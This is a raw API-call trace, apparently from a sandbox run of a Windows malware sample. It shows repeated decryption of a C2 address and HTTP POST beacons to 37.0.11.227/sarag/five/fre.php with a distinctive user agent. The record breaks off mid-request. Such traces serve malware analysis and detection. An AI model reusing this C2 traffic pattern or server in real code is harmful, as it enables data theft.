0 [0283.435] GetProcessHeap () returned 0x690000 [0283.435] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab460 [0283.435] socket (af=2, type=1, protocol=6) returned 0x8e8 [0283.435] connect (s=0x8e8, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0283.457] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0283.457] GetProcessHeap () returned 0x690000 [0283.457] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0283.457] GetProcessHeap () returned 0x690000 [0283.457] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0283.458] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0283.460] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0283.460] GetProcessHeap () returned 0x690000 [0283.460] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af980 [0283.460] GetProcessHeap () returned 0x690000 [0283.461] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0283.461] GetProcessHeap () returned 0x690000 [0283.461] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0283.461] GetProcessHeap () returned 0x690000 [0283.461] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0283.462] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0283.462] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0283.463] GetProcessHeap () returned 0x690000 [0283.463] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0283.463] GetProcessHeap () returned 0x690000 [0283.463] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0283.463] send (s=0x8e8, buf=0x6ad508*, len=242, flags=0) returned 242 [0283.463] send (s=0x8e8, buf=0x6aba40*, len=159, flags=0) returned 159 [0283.464] GetProcessHeap () returned 0x690000 [0283.464] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0283.464] recv (in: s=0x8e8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0283.545] GetProcessHeap () returned 0x690000 [0283.545] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0283.546] GetProcessHeap () returned 0x690000 [0283.546] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0283.546] GetProcessHeap () returned 0x690000 [0283.546] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x690000) returned 1 [0283.546] GetProcessHeap () returned 0x690000 [0283.547] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0283.547] closesocket (s=0x8e8) returned 0 [0283.548] GetProcessHeap () returned 0x690000 [0283.548] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab460 | out: hHeap=0x690000) returned 1 [0283.548] GetProcessHeap () returned 0x690000 [0283.548] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0283.548] GetProcessHeap () returned 0x690000 [0283.548] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0283.548] GetProcessHeap () returned 0x690000 [0283.549] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0283.549] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16e8) returned 0x8e8 [0283.551] Sleep (dwMilliseconds=0xea60) [0283.552] GetProcessHeap () returned 0x690000 [0283.552] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0283.553] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.554] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0283.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.566] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0283.573] GetProcessHeap () returned 0x690000 [0283.573] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0283.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.574] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0283.575] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.575] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0283.580] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.580] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0283.580] GetProcessHeap () returned 0x690000 [0283.581] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0283.581] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.582] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0283.582] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.583] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0283.583] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.583] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0283.583] GetProcessHeap () returned 0x690000 [0283.583] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0283.584] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.584] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0283.585] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.585] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0283.586] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.586] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0283.587] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.587] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0283.587] GetProcessHeap () returned 0x690000 [0283.587] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0283.587] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0283.587] GetProcessHeap () returned 0x690000 [0283.588] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0283.588] GetProcessHeap () returned 0x690000 [0283.588] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0283.588] GetProcessHeap () returned 0x690000 [0283.588] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0283.588] GetProcessHeap () returned 0x690000 [0283.589] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0283.589] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.589] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0283.594] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.594] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0283.599] GetProcessHeap () returned 0x690000 [0283.599] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0283.602] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.602] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0283.603] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.603] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0283.603] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.604] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0283.604] GetProcessHeap () returned 0x690000 [0283.604] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0283.605] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.605] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0283.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.606] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0283.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.607] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0283.607] GetProcessHeap () returned 0x690000 [0283.607] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0283.608] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.608] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0283.608] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.609] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0283.609] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.609] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0283.610] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.610] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0283.610] GetProcessHeap () returned 0x690000 [0283.610] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0283.610] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0283.612] GetProcessHeap () returned 0x690000 [0283.612] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab390 [0283.612] socket (af=2, type=1, protocol=6) returned 0x8ec [0283.612] connect (s=0x8ec, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0283.635] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0283.635] GetProcessHeap () returned 0x690000 [0283.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0283.635] GetProcessHeap () returned 0x690000 [0283.636] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0283.639] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0283.639] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0283.639] GetProcessHeap () returned 0x690000 [0283.639] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afbc0 [0283.639] GetProcessHeap () returned 0x690000 [0283.640] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0283.640] GetProcessHeap () returned 0x690000 [0283.640] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0283.640] GetProcessHeap () returned 0x690000 [0283.640] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0283.641] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0283.641] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0283.641] GetProcessHeap () returned 0x690000 [0283.641] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0283.641] GetProcessHeap () returned 0x690000 [0283.642] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0283.642] send (s=0x8ec, buf=0x6ad508*, len=242, flags=0) returned 242 [0283.642] send (s=0x8ec, buf=0x6aba40*, len=159, flags=0) returned 159 [0283.642] GetProcessHeap () returned 0x690000 [0283.642] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0283.642] recv (in: s=0x8ec, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0283.744] GetProcessHeap () returned 0x690000 [0283.744] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0283.745] GetProcessHeap () returned 0x690000 [0283.745] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0283.745] GetProcessHeap () returned 0x690000 [0283.745] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afbc0 | out: hHeap=0x690000) returned 1 [0283.745] GetProcessHeap () returned 0x690000 [0283.745] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0283.745] closesocket (s=0x8ec) returned 0 [0283.746] GetProcessHeap () returned 0x690000 [0283.746] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab390 | out: hHeap=0x690000) returned 1 [0283.746] GetProcessHeap () returned 0x690000 [0283.746] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0283.746] GetProcessHeap () returned 0x690000 [0283.747] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0283.747] GetProcessHeap () returned 0x690000 [0283.747] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0283.747] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16ec) returned 0x8ec [0283.749] Sleep (dwMilliseconds=0xea60) [0283.750] GetProcessHeap () returned 0x690000 [0283.751] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0283.751] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.752] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0283.757] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.758] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0283.764] GetProcessHeap () returned 0x690000 [0283.764] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0283.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.768] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0283.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.770] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0283.771] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.771] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0283.771] GetProcessHeap () returned 0x690000 [0283.771] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0283.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.773] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0283.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.774] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0283.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.775] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0283.775] GetProcessHeap () returned 0x690000 [0283.775] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0283.778] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.778] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0283.779] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.780] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0283.780] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.781] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0283.781] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.782] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0283.782] GetProcessHeap () returned 0x690000 [0283.782] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0283.782] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0283.785] GetProcessHeap () returned 0x690000 [0283.786] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0283.786] GetProcessHeap () returned 0x690000 [0283.786] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0283.786] GetProcessHeap () returned 0x690000 [0283.786] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0283.786] GetProcessHeap () returned 0x690000 [0283.786] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0283.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.788] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0283.793] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.793] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0283.801] GetProcessHeap () returned 0x690000 [0283.801] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0283.801] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.802] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0283.803] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.803] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0283.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.804] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0283.804] GetProcessHeap () returned 0x690000 [0283.804] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0283.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.805] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0283.806] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.807] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0283.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.808] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0283.808] GetProcessHeap () returned 0x690000 [0283.808] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0283.808] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.811] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0283.811] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.812] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0283.812] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.813] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0283.814] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.814] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0283.814] GetProcessHeap () returned 0x690000 [0283.814] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0283.814] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0283.814] GetProcessHeap () returned 0x690000 [0283.814] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3a0 [0283.814] socket (af=2, type=1, protocol=6) returned 0x8f0 [0283.815] connect (s=0x8f0, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0283.838] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0283.838] GetProcessHeap () returned 0x690000 [0283.838] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0283.838] GetProcessHeap () returned 0x690000 [0283.838] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0283.839] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0283.840] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: 